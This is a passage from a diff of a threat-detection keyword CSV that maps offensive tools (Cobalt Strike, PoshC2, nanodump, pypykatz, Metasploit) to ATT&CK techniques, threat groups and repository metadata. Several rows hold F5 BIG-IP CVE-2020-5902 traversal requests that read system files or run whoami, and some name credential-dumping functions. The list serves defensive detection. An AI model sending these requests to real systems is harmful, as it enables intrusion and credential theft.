T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" 
+"*georgesotiriadis/Chimera*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" 
@@ -10576,295 +10727,295 @@ "*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*get_beacon(*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*get_BeaconHealthCheck_settings*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" 
-"*get_c2_messages*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_c2server_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_cmd_from_task_id*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_dns_dnsidle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 
- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*Get_DPAPI_Protected_Files*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*get_filezilla_creds.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*get_c2_messages*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_c2server_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_cmd_from_task_id*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware 
C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_dns_dnsidle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Get_DPAPI_Protected_Files*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*get_filezilla_creds.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*get_hijackeable_dllname*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*get_implants_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_implants_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 
- T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*get_injection_techniques*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*get_keystrokes.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*get_keystrokes.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*get_list_of_implant_text*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*get_masterkeys_from_lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*get_newimplanturl*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_newimplanturl*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*get_obfucation_string_dict*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" 
-"*get_password_policy.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*get_password_policy.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*get_post_ex_pipename_list*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_post_ex_spawnto_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
